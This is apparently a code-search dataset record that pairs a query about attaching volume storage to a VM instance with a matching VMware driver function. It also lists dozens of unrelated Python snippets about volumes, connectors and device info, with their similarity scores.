self._connector", "def get_volume(self):\n return self.__volume", "def get_connector_properties(root_helper, *args, **kwargs):\n return {}", "def ConnectionInfo(self):\n if (self._accountKind == \"azure\"):\n print(\"%s: %s\" % (DataConnection.accountName, self._accountName))\n print(\"%s: %s\" % (DataConnection.accountKind, self._accountKind))\n else:\n raise NotImplementedError(DataConnection.notYetImplementedMsg)", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def volume(self):\n return self.structure.volume", "def get_volume_info(host, disk_object, dc_obj):\n host_resource = get_host_resource_by_name(host)\n\n vol_id = disk_object.get_image_id()\n sd_id = disk_object.get_storage_domains().get_storage_domain()[0].get_id()\n image_id = disk_object.get_id()\n sp_id = dc_obj.get_id()\n\n args = {\n \"storagepoolID\": sp_id,\n \"storagedomainID\": sd_id,\n \"imageID\": image_id,\n \"volumeID\": vol_id,\n }\n\n return host_resource.vds_client(cmd=\"Volume.getInfo\", args=args)", "def getVolume(self):\n return _libsbml.Compartment_getVolume(self)", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def getVolume(self):\n return self.__volume", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def initialize_connection(self, volume, connector):\n # create client\n initiator_iqn = connector['initiator']\n self.create_client(initiator_iqn)\n auth = self._get_auth_for_client(initiator_iqn)\n username = initiator_iqn\n if not auth['password']:\n password = volume_utils.generate_password(length=self.CHAP_LENGTH)\n self._set_chap_for_client(initiator_iqn, username, password)\n else:\n LOG.debug(\"using existing CHAP password\")\n password = auth['password']\n\n # add disk for export\n iscsi_config = self._get_config()\n\n # First have to ensure that the disk is registered with\n # the gateways.\n self.create_disk(volume.name)\n self.register_disk(self.target_iqn, volume.name)\n\n iscsi_config = self._get_config()\n # Now export the disk to the initiator\n lun = self.export_disk(initiator_iqn, volume.name, iscsi_config)\n\n # fetch the updated config so we can get the lun id\n iscsi_config = self._get_config()\n target_info = iscsi_config['targets'][self.target_iqn]\n ips = target_info['ip_list']\n\n target_portal = ips[0]\n if netutils.is_valid_ipv6(target_portal):\n target_portal = \"[%s]:3260\" % target_portal\n else:\n target_portal = \"%s:3260\" % target_portal\n\n data = {\n 'driver_volume_type': 'iscsi',\n 'data': {\n 'target_iqn': self.target_iqn,\n 'target_portal': target_portal,\n 'target_lun': lun['id'],\n 'auth_method': 'CHAP',\n 'auth_username': username,\n 'auth_password': password,\n }\n }\n return data", "def get_device_information(self):\n return self.mycam.devicemgmt.GetDeviceInformation()", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = 
json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def device_info(self):\n return {\n \"name\": self._alias,\n \"model\": self._model,\n \"manufacturer\": \"TP-Link\",\n \"connections\": {(dr.CONNECTION_NETWORK_MAC, self._mac)},\n \"sw_version\": self._sysinfo[\"sw_ver\"],\n }", "def extract_volume(self):\n\n # RDD or array of [(partition, vol)]\n vols = None\n if self.usespark:\n vols = self._retrieve_vol(self.current_spot, None)\n else:\n vols = self._retrieve_vol(self.current_spot, len(self.partitions))\n self.current_spot += len(self.partitions)\n \n return vols", "def get_ceph_drv_info():\n disks_info = []\n stat = psutil.disk_io_counters(perdisk=True)\n for drv in get_ceph_disk():\n info = CEPHDiskInfo(drv)\n disk = basename(drv)\n if disk in stat:\n info.rd_cnt = stat[disk].read_count\n info.wr_cnt = stat[disk].write_count\n info.rd_bytes = stat[disk].read_bytes\n info.wr_bytes = stat[disk].write_bytes\n info.rd_time = stat[disk].read_time\n info.wr_time = stat[disk].write_time\n\n disks_info.append(info)\n\n return disks_info", "def volumes(self):", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def _get_connector_type(self):\n\n raise NotImplementedError()", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def volume(self):\n return self.volume_array", "def volume(self):\n return self._volume", "def volume(self):\n return self._volume", "def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])", "def src_connector(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n if not self.context.src_connectors:\n return None\n uid = self.context.src_connectors[0]\n brains = catalog(UID=uid)\n if not brains:\n return None\n return brains[0].getObject()", "def get_connect(self):\n\t\treturn self.connect", "def get_bond_info(self):\n return", "def connector(self) -> Optional[servo.Connector]:\n return self._connector", "def device_info(self) -> Dict[str, Any]:\n return {\n 'name': 'Solar Panels',\n 'identifiers': {\n (DOMAIN, self.toon.agreement.id, 'solar'),\n },\n 'via_device': (DOMAIN, self.toon.agreement.id, 'meter_adapter'),\n }", "def get_connection_info(self):\n return [(c.fullname, [u[1] for u in c.objects])\n for c in self._connections]", "def instance_connector(self):\n if '_instance_connector' not in self.__dict__:\n from meerschaum.connectors.parse import parse_instance_keys\n conn = parse_instance_keys(self.instance_keys)\n if conn:\n self._instance_connector = conn\n else:\n return None\n return self._instance_connector", "def name(self):\n return 'Connected Devices'", "def volumes(self) -> dict:\n return self.data[\"volumes\"]", "def get_connection_info(haconf=False):\n cfg = Utility.read_configuration(config=\"DEVICEDETECT\")\n\n if haconf:\n from glob import glob\n # Read one other than cfg[\"devicedb\"]\n dbs = glob(\"cache/*devices.db\")\n\n for db in dbs:\n if db != cfg[\"devicedb\"]:\n return sqlite3.connect(db), cfg[\"tablename\"]\n return sqlite3.connect(cfg[\"devicedb\"]), cfg[\"tablename\"]", "def volume(self):\n v = {'art': 
self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def volume(self):\n v = {'art': self._vart, 'ven': self._vven}\n if self._lvad is not None:\n v['lvad'] = self._lvad.volume['lvad']\n return v", "def get_volume(self):\n import fcntl\n import struct\n knob = bytearray(struct.pack(\"III\", 0, 0, 0)) # VOLUME_DEVICE_ID, VOLUME_KNOB_ID, <Unused>\n try:\n fcntl.ioctl(self.mixer_fd, 2, knob, True)\n _,_,value = struct.unpack(\"III\", knob)\n return value\n except:\n return 0", "def device(self):\n return self.share.device", "def get_volumes_detail(self, **kw):\n return (200, {}, {\"volumes\": [\n {'id': 1234,\n 'name': 'sample-volume for cinder',\n 'attachments': [{'server_id': 12234}]},\n {'id': 'pvcvolume',\n 'name': 'pvc sample-volume for cinder',\n 'attachments': [{'server_id': 54321}]}\n ]})", "def get_endpoint_connection_info(coriolis, barbican, endpoint):\n endpoint_conn_info = coriolis.endpoints.get(endpoint).to_dict().get(\n 'connection_info')\n\n if 'secret_ref' not in endpoint_conn_info:\n # this endpoint is not using Barbican for secret storage:\n return endpoint_conn_info\n\n secret = barbican.secrets.get(endpoint_conn_info['secret_ref'])\n\n return json.loads(secret.payload)", "def connected_endpoint(self):\n try:\n if self._connected_poweroutlet:\n return self._connected_poweroutlet\n except ObjectDoesNotExist:\n pass\n try:\n if self._connected_powerfeed:\n return self._connected_powerfeed\n except ObjectDoesNotExist:\n pass\n return None", "def volume(self):\n vol = None\n if self._mixer:\n vol = self._mixer.getvolume()\n return vol", "def getComponentVolume(self):\n lengthO = self.getDimension(\"lengthOuter\")\n widthO = self.getDimension(\"widthOuter\")\n heightO = self.getDimension(\"heightOuter\")\n lengthI = self.getDimension(\"lengthInner\")\n widthI = self.getDimension(\"widthInner\")\n heightI = self.getDimension(\"heightInner\")\n mult = self.getDimension(\"mult\")\n vol = mult * (lengthO * widthO * heightO - lengthI * widthI * heightI)\n return vol", "def volume(self):\n return [node.volume for node in self]", "def get(self, cid):\n if cid not in self.connectors:\n self.connectors[cid] = ClientConnectorStatistics(cid)\n\n return self.connectors[cid]", "def device_info(self):\n return {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._mac)},\n \"default_name\": self._device_name,\n \"default_model\": self._device[\"device_model\"],\n \"via_device\": (DOMAIN, self._router.unique_id),\n }", "def get_volume_info(self):\n if self.issue:\n return f\"{self.volume} ({self.issue}), {self.pages}\"\n else:\n return f\"{self.volume}, {self.pages}\"", "def volume(self):\n return _cantera.reactor_volume(self.__reactor_id)", "def channelinfo(self):\n\n return ChannelInfo(\n self._filetextbox.text(),\n self._idtextbox.text(),\n self._datafilebox.text()\n )", "def connect_volume(self, connection_properties, scan_tries):\n device_info = {'type': 'block'}\n\n # TODO(Strony): support the iSCSI multipath on Solaris.\n self._connect_to_iscsi_portal(connection_properties)\n\n host_device = self._get_device_path(connection_properties)\n\n # check if it is a valid device path.\n for i in range(1, scan_tries):\n if os.path.exists(host_device):\n break\n else:\n time.sleep(i ** 2)\n else:\n raise exception.VolumeDeviceNotFound(device=host_device)\n\n # Set the label EFI to the disk on 
SPARC before it is accessed and\n # make sure the correct device path with slice 0\n # (like '/dev/rdsk/c0t600xxxd0s0').\n if platform.processor() == 'sparc':\n tmp_dev_name = host_device.rsplit('s', 1)\n disk_name = tmp_dev_name[0].split('/')[-1]\n (out, _err) = self.execute('/usr/sbin/format', '-L', 'efi', '-d',\n disk_name)\n host_device = '%ss0' % tmp_dev_name[0]\n\n device_info['path'] = host_device\n return device_info", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", \"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_connector(self, connector_id):\n if connector_id == \"\":\n raise ValueError(\"No value specified for connector_id\")\n endpoint = self.api_path_connectors + connector_id\n resp = self._do_api_call((\"GET\", endpoint))\n return resp[\"data\"]", "def GetHandle(self):\n return _XCAFDoc.XCAFDoc_Volume_GetHandle(self)", "def device_info(self) -> DeviceInfo:\n return DeviceInfo(\n identifiers={(DOMAIN, self.unique_id)},\n manufacturer=\"Volumio\",\n model=self._info[\"hardware\"],\n name=self._name,\n sw_version=self._info[\"systemversion\"],\n )", "def get_volume_info(self, uid):\n LOG.debug(\"Entering\")\n cmd = \"svcinfo lsvdisk -bytes -filtervalue vdisk_UID=%s -delim :\" % uid\n output = self._svc_command(cmd)[0]\n\n if len(output) != 2:\n raise SVCVolumeNotFound(\n _(\"Couldn't find volume information for UID %s\") % uid)\n\n header = output[0].split(':')\n values = output[1].split(':')\n index = header.index(SVC_KEY_VDISK_ID)\n diskId = values[index]\n index = header.index(SVC_KEY_VDISK_NAME)\n name = values[index]\n index = header.index(SVC_KEY_VOLUME_GROUP)\n volumeGroup = values[index]\n index = header.index(SVC_KEY_VDISK_CAPACITY)\n capacity = values[index]\n\n info = {SVC_KEY_VDISK_ID: diskId,\n SVC_KEY_VDISK_NAME: name,\n SVC_KEY_VOLUME_GROUP: volumeGroup,\n SVC_KEY_VDISK_CAPACITY: capacity}\n\n LOG.debug(\"Exiting\")\n return info", "def get(self, cid):\n if cid not in self.connectors:\n self.connectors[cid] = ServerConnectorStatistics(cid)\n\n return self.connectors[cid]", "def vpc_connector_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"vpc_connector_name\")", "def device_information(self):\n return self._device_information", "def get_radio_info(self):\n return self.get(COMMAND_CPM, 'GetRadioInfo')", "def target_connector(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n if not self.context.target_connector:\n return None\n uid = self.context.target_connector\n brains = catalog(UID=uid)\n if not brains:\n return None\n return brains[0].getObject()", "def device_info(self) -> interface.DeviceInfo:\n return self._device_info", "def getComponentVolume(self, cold=False):\n od = self.getDimension(\"od\", cold=cold)\n iD = self.getDimension(\"id\", cold=cold)\n mult = self.getDimension(\"mult\")\n vol = mult * 4.0 / 3.0 * math.pi * ((od / 2.0) ** 3 - (iD / 2.0) ** 3)\n return vol", "def get_boot_device(self):\n root_vol = None\n boot_vol = None\n for volume in self.volumes:\n if not volume.partitions:\n continue\n for 
partition in volume.partitions:\n if partition.mount_point == \"/\":\n root_vol = volume\n elif partition.mount_point == '/boot':\n boot_vol = volume\n\n if not boot_vol:\n return root_vol\n return boot_vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volumes(self):\n url = self._get_url() + 'volumes'\n volumes = self._request(url)\n return volumes.json()", "def get_channels(self):\n bus_name = self.telepathy_conn.requested_bus_name\n connection_path = self.telepathy_conn.object_path\n channels = [self.telepathy_text_chan.object_path,\n self.telepathy_tubes_chan.object_path]\n\n print('%r: bus name is %s, connection is %s, channels are %r',\n self, bus_name, connection_path, channels)\n return bus_name, connection_path, channels", "def device_info(self):\n return {\n \"name\": get_device_name(self._data, self._actuator.id),\n \"identifiers\": {(DOMAIN, get_identifier(self._data, self._actuator.id))},\n \"via_device\": (DOMAIN, self._data.wiserhub.system.name),\n }", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def get_device(self):\n return self.parent.get_device()", "def info(self) -> ConnectionInfo:\n return ConnectionInfo(self.pgconn)", "def bdev_opal_get_info(client, bdev_name, password):\n params = {\n 'bdev_name': bdev_name,\n 'password': password,\n }\n\n return client.call('bdev_opal_get_info', params)", "def getChannel(self):\r\n return self.channel", "def return24hVolume(self):\n pass", "def GetFATVolume(self):\n return self._fsfat_volume", "def return24Volume(self):\n v = self.dpay.rpc.get_volume(api=\"market_history\")\n return {'bbd_volume': v[\"bbd_volume\"],\n 'dpay_volume': v[\"dpay_volume\"]}", "def get_catalog(self) -> Dict[str, str]:\n return self.catalog", "def get_version_info(self):\n return self._jadeRpc('get_version_info')", "def Volume(self, default=None):\n return self.data.get('volume', default)", "def get_definition(self):\n return self.client._perform_json(\n \"GET\", \"/admin/connections/%s\" % self.name)", "def get_vdw_info(self):\n return", "def create_test_volume_connector(**kw):\n connector = get_test_volume_connector(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del connector['id']\n dbapi = db_api.get_instance()\n return dbapi.create_volume_connector(connector)", "def get_coulomb_info(self):\n return", "def source_connections_info(self) -> pulumi.Output[Sequence['outputs.MapperSourceConnectionsInfoResponse']]:\n return pulumi.get(self, \"source_connections_info\")", "def get_info(volpath):\n dhandle = vol_open_path(volpath, VMDK_OPEN_DISKCHAIN_NOIO)\n\n if not disk_is_valid(dhandle):\n logging.warning(\"Failed to open disk - %s\", volpath)\n return None\n\n sinfo = disk_info()\n res = lib.DiskLib_GetSize(dhandle, 0, VMDK_MAX_SNAPS, byref(sinfo))\n\n lib.DiskLib_Close(dhandle)\n if res != 0:\n logging.warning(\"Failed to get size of disk %s - %x\", volpath, res)\n return None\n\n return {VOL_SIZE: convert(sinfo.size), VOL_ALLOC: convert(sinfo.allocated)}", "def send_connection_information(self):\n return self.connection_information", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def get_device_info(handle, timeout):\n device_info = dict()\n device_info['ls'] = ceph_mon_command(handle, 'device ls', 
timeout)\n\n return device_info", "def connector(self) -> DatabaseConnector:\n return self._connector" ]
[ "0.6858231", "0.6418148", "0.62130344", "0.60607785", "0.6042523", "0.58188075", "0.5792801", "0.5697431", "0.55846596", "0.55579096", "0.5506042", "0.5469819", "0.5426191", "0.5425665", "0.54218316", "0.5421626", "0.54012877", "0.53762865", "0.53762865", "0.5360571", "0.53501505", "0.5332365", "0.5330535", "0.53274167", "0.53186363", "0.53176093", "0.5315009", "0.53113294", "0.53073996", "0.5284102", "0.5278957", "0.52763486", "0.52759343", "0.52759343", "0.522144", "0.52085024", "0.51789206", "0.5178361", "0.51680547", "0.51636416", "0.5152914", "0.5152556", "0.5119858", "0.51178634", "0.5101588", "0.51011974", "0.51011974", "0.51011974", "0.50988334", "0.5084045", "0.5082255", "0.50817734", "0.5080451", "0.50657195", "0.5046491", "0.50421906", "0.5038505", "0.5032082", "0.50226", "0.502248", "0.50211793", "0.50165826", "0.5015893", "0.500574", "0.5004417", "0.49822202", "0.4974005", "0.49674514", "0.49643338", "0.49638316", "0.49628916", "0.49596903", "0.49498087", "0.49457598", "0.49327052", "0.492473", "0.4914411", "0.49093214", "0.49063042", "0.4903671", "0.49005064", "0.48999277", "0.48978388", "0.4897364", "0.48940715", "0.4886816", "0.4880167", "0.4876698", "0.48736116", "0.48703942", "0.4864784", "0.4859031", "0.482534", "0.4823711", "0.48224857", "0.48137128", "0.48105088", "0.48066562", "0.48055357", "0.4804674" ]
0.7179875
0
Attach volume storage to VM instance.
def attach_volume(self, connection_info, instance, mountpoint):
    instance_name = instance['name']
    vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name)
    if vm_ref is None:
        raise exception.InstanceNotFound(instance_id=instance_name)
    # Attach Volume to VM
    LOG.debug(_("Attach_volume: %(connection_info)s, %(instance_name)s, "
                "%(mountpoint)s") % locals())
    driver_type = connection_info['driver_volume_type']
    if driver_type not in ['iscsi']:
        raise exception.VolumeDriverNotFound(driver_type=driver_type)
    data = connection_info['data']
    mount_unit = volume_util.mountpoint_to_number(mountpoint)
    # Discover iSCSI Target
    device_name, uuid = self.discover_st(data)
    if device_name is None:
        raise volume_util.StorageError(_("Unable to find iSCSI Target"))
    # Get the vmdk file name that the VM is pointing to
    hardware_devices = self._session._call_method(vim_util,
                                                  "get_dynamic_property",
                                                  vm_ref, "VirtualMachine",
                                                  "config.hardware.device")
    vmdk_file_path, controller_key, adapter_type, disk_type, unit_number \
        = vm_util.get_vmdk_path_and_adapter_type(hardware_devices)
    # Figure out the correct unit number
    if unit_number < mount_unit:
        unit_number = mount_unit
    else:
        unit_number = unit_number + 1
    self.attach_disk_to_vm(vm_ref, instance_name,
                           adapter_type, disk_type="rdmp",
                           controller_key=controller_key,
                           unit_number=unit_number,
                           device_name=device_name)
    LOG.info(_("Mountpoint %(mountpoint)s attached to "
               "instance %(instance_name)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def attach_volume(self):\n\n # Choose volume\n volume_id = self._choose_among_available_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Choose instance\n instance_id = self._choose_among_running_instances()\n\n # Cancel\n if not instance_id:\n print 'Operation cancelled'\n return\n\n # Attach the volume\n print '# Attaching volume \"%s\"!' % volume_id\n if self.compute.attach_volume(volume_id, instance_id):\n print 'The volume has been attached!'\n else:\n print 'The volume could not been attached'", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):\n data = connection_info['data']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n luns = [i.lun for i in data_disks]\n new_lun = 1\n # azure allow upto 16 extra datadisk, 1 os disk + 1 ephemeral disk\n # ephemeral disk will always be sdb for linux.\n for i in range(1, 16):\n if i not in luns:\n new_lun = i\n break\n else:\n msg = 'Can not attach volume, exist volume amount upto 16.'\n LOG.error(msg)\n raise nova_ex.NovaException(msg)\n disk = self.disks.get(CONF.azure.resource_group, data['disk_name'])\n managed_disk = dict(id=disk.id)\n data_disk = dict(lun=new_lun,\n name=data['disk_name'],\n managed_disk=managed_disk,\n create_option='attach')\n data_disks.append(data_disk)\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Attach Volume to Instance in Azure finish\"),\n instance=instance)", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def attach_volume(self,\n context,\n connection_info,\n instance,\n mountpoint,\n disk_bus=None,\n device_type=None,\n encryption=None):\n\n def _check_available_lun(data_disks):\n # We can attach upto 16 data disks to an instance\n luns = [i.lun for i in data_disks]\n for i in range(1, 16):\n if i not in luns:\n return i\n raise Exception(\"Could not attach volume\")\n\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n lun = _check_available_lun(data_disks)\n name = volume_data['name']\n id = volume_data['id']\n data_disk = {\n 'name': name,\n 'create_option': 'attach',\n 'lun': lun,\n 'managed_disk': {\n 'id': id\n }\n }\n data_disks.append(data_disk)\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Attached volume %s to instance %s\" % (name, instance.uuid))", "def attach_volume(self, host_path: str, container_path: str, mode: str = None):\n self.volumes[host_path] = {\n \"bind\": container_path,\n \"mode\": mode or \"Z\"\n }", "def attach(self, instance_id, device):\r\n return self.connection.attach_volume(self.id, instance_id, device)", "def attach(self, node, device=None):\r\n\r\n return self.driver.attach_volume(node=node, volume=self, device=device)", "def attach(**_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.target.instance)\n\n if ctx.source.node.properties[constants.ZONE] not in \\\n ctx.target.instance.runtime_properties.get('placement'):\n 
ctx.logger.info(\n 'Volume Zone {0} and Instance Zone {1} do not match. '\n 'This may lead to an error.'.format(\n ctx.source.node.properties[constants.ZONE],\n ctx.target.instance.runtime_properties.get('placement')\n )\n )\n\n if _attach_external_volume_or_instance(instance_id):\n return\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n if constants.VOLUME_CREATING in volume_object.update():\n return ctx.operation.retry(\n message='Waiting for volume to be ready. '\n 'Volume in state {0}'\n .format(volume_object.status))\n elif constants.VOLUME_AVAILABLE not in volume_object.update():\n raise NonRecoverableError(\n 'Cannot attach Volume {0} because it is in state {1}.'\n .format(volume_object.id, volume_object.status))\n\n ctx.logger.debug(\n 'Attempting to attach volume {0} to instance {1}.'\n .format(volume_id, instance_id))\n\n try:\n volume_object.attach(\n instance_id,\n ctx.source.node.properties['device'])\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n ctx.source.instance.runtime_properties['instance_id'] = \\\n instance_id\n ctx.logger.info(\n 'Attached EBS volume {0} with instance {1}.'\n .format(volume_id, instance_id))", "def attach_volume(\n self,\n volume: Union[dto.Volume, str],\n machine: Union[dto.Machine, str]\n ) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def attach_volume(self, volume_id, instance_id, device):\r\n params = {'InstanceId' : instance_id,\r\n 'VolumeId' : volume_id,\r\n 'Device' : device}\r\n return self.get_status('AttachVolume', params, verb='POST')", "def test_pvcvolume_attach(self):\n v = self.cs.volumes.get('pvcvolume')\n self.cs.volumes.attach(v, 1, '/dev/vdc')\n self.cs.assert_called('POST',\n '/volumes/pvcvolume/action')", "def attach_volume(self, volume, device=\"/dev/sdp\"):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.attach_volume(volume_id=volume_id, instance_id=self.instance_id, device=device)", "def AttachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('AttachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def attach_volume(self, context, volume_id, instance_uuid, host_name,\n mountpoint, mode):\n @utils.synchronized(volume_id, external=True)\n def do_attach():\n # check the volume status before attaching\n volume = self.db.volume_get(context, volume_id)\n volume_metadata = self.db.volume_admin_metadata_get(\n context.elevated(), volume_id)\n if volume['status'] == 'attaching':\n if (volume['instance_uuid'] and volume['instance_uuid'] !=\n instance_uuid):\n msg = _(\"being attached by another instance\")\n raise exception.InvalidVolume(reason=msg)\n if (volume['attached_host'] and volume['attached_host'] !=\n host_name):\n msg = _(\"being attached by another host\")\n raise exception.InvalidVolume(reason=msg)\n if (volume_metadata.get('attached_mode') and\n volume_metadata.get('attached_mode') != mode):\n msg = _(\"being attached by different mode\")\n raise exception.InvalidVolume(reason=msg)\n elif volume['status'] != \"available\":\n msg = _(\"status must be available\")\n raise exception.InvalidVolume(reason=msg)\n # TODO(jdg): attach_time column is currently varchar\n # we should update this to a date-time 
object\n # also consider adding detach_time?\n self.db.volume_update(context, volume_id,\n {\"instance_uuid\": instance_uuid,\n \"mountpoint\": mountpoint,\n \"attached_host\": host_name\n })\n\n self.db.volume_admin_metadata_update(context.elevated(),\n volume_id,\n {\"attached_mode\": mode},\n False)\n return do_attach()", "def test_manage_volume_attachments(self, volume, instance, volumes_steps):\n volumes_steps.attach_instance(volume.name, instance.name)\n volumes_steps.detach_instance(volume.name, instance.name)", "def attach_volume(self, instance_id, volume_id, device):\n response = volume.attach_volume(self.url, self.verb, self.headers,\n self.version, instance_id, volume_id, device)\n if response is not None :\n res = AttachVolumeResponse.AttachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def attach_volume(self, server, volume, device=None, tag=None,\n wait_for_detach=True):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n\n # NOTE(lyarwood): During attach we initially wait for the volume\n # attachment and then check the volume state.\n waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n # TODO(lyarwood): Remove the following volume status checks and move to\n # attachment status checks across all volumes now with the 3.27\n # microversion somehow.\n if not volume['multiattach']:\n waiters.wait_for_volume_resource_status(\n self.volumes_client, volume['id'], 'in-use')\n\n # NOTE(lyarwood): On teardown (LIFO) initially wait for the volume\n # attachment in Nova to be removed. While this technically happens last\n # we want this to be the first waiter as if it fails we can then dump\n # the contents of the console log. The final check of the volume state\n # should be a no-op by this point and is just added for completeness\n # when detaching non-multiattach volumes.\n if not volume['multiattach'] and wait_for_detach:\n self.addCleanup(\n waiters.wait_for_volume_resource_status, self.volumes_client,\n volume['id'], 'available')\n self.addCleanup(\n waiters.wait_for_volume_attachment_remove_from_server,\n self.servers_client, server['id'], volume['id'])\n self.addCleanup(self._detach_volume, server, volume)\n\n return attachment", "def attach(self):\n log.info('Adding volume {0} ({1})...'.format(\n self.volume_id, self.fs.get_full_name()))\n # Bail if the volume doesn't exist, or is already attached\n if self.status == volume_status.NONE or self.status == volume_status.DELETING:\n log.error('Attempt to attach non-existent volume {0}'.format(\n self.volume_id))\n return None\n elif self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE:\n log.debug('Volume {0} already attached as {1}'.format(\n self.volume_id, self.device))\n return self.device\n\n # Wait for the volume to become available\n if self.from_snapshot_id and self.status == volume_status.CREATING:\n # Eucalyptus can take an inordinate amount of time to create a\n # volume from a snapshot\n log.debug(\"Waiting for volume to be created from a snapshot...\")\n if not self.wait_for_status(volume_status.AVAILABLE):\n log.error('Volume never reached available from creating status. 
Status is {0}'.format(\n self.status))\n elif self.status != volume_status.AVAILABLE:\n if not self.wait_for_status(volume_status.AVAILABLE):\n log.error('Volume never became available to attach. Status is {0}'.format(\n self.status))\n return None\n\n # attempt to attach\n for attempted_device in self._get_likely_next_devices():\n pre_devices = self._get_device_list()\n log.debug(\n 'Before attach, devices = {0}'.format(' '.join(pre_devices)))\n if self._do_attach(attempted_device):\n if self.wait_for_status(volume_status.ATTACHED):\n time.sleep(10) # give a few seconds for the device to show up in the OS\n post_devices = self._get_device_list()\n log.debug('After attach, devices = {0}'.format(\n ' '.join(post_devices)))\n new_devices = post_devices - pre_devices\n log.debug('New devices = {0}'.format(' '.join(new_devices)))\n if len(new_devices) == 0:\n log.debug('Could not find attached device for volume {0}. Attempted device = {1}'\n .format(self.volume_id, attempted_device))\n elif attempted_device in new_devices:\n self.device = attempted_device\n return attempted_device\n elif len(new_devices) > 1:\n log.error(\"Multiple devices (%s) added to OS during process, \"\n \"and none are the requested device. Can't determine \"\n \"new device. Aborting\" % ', '.join(new_devices))\n return None\n else:\n device = tuple(new_devices)[0]\n self.device = device\n log.debug(\"For {0}, set self.device to {1}\".format(\n self.fs.get_full_name(), device))\n return device\n # requested device didn't attach, for whatever reason\n if self.status != volume_status.AVAILABLE and attempted_device[-3:-1] != 'vd':\n self.detach() # in case it attached invisibly\n self.wait_for_status(volume_status.AVAILABLE, 60)\n return None # no device properly attached", "def AttachDisk(self, disk: 'AZComputeDisk') -> None:\n vm = self.compute_client.virtual_machines.get(\n self.resource_group_name, self.name)\n data_disks = vm.storage_profile.data_disks\n # ID to assign to the data disk to 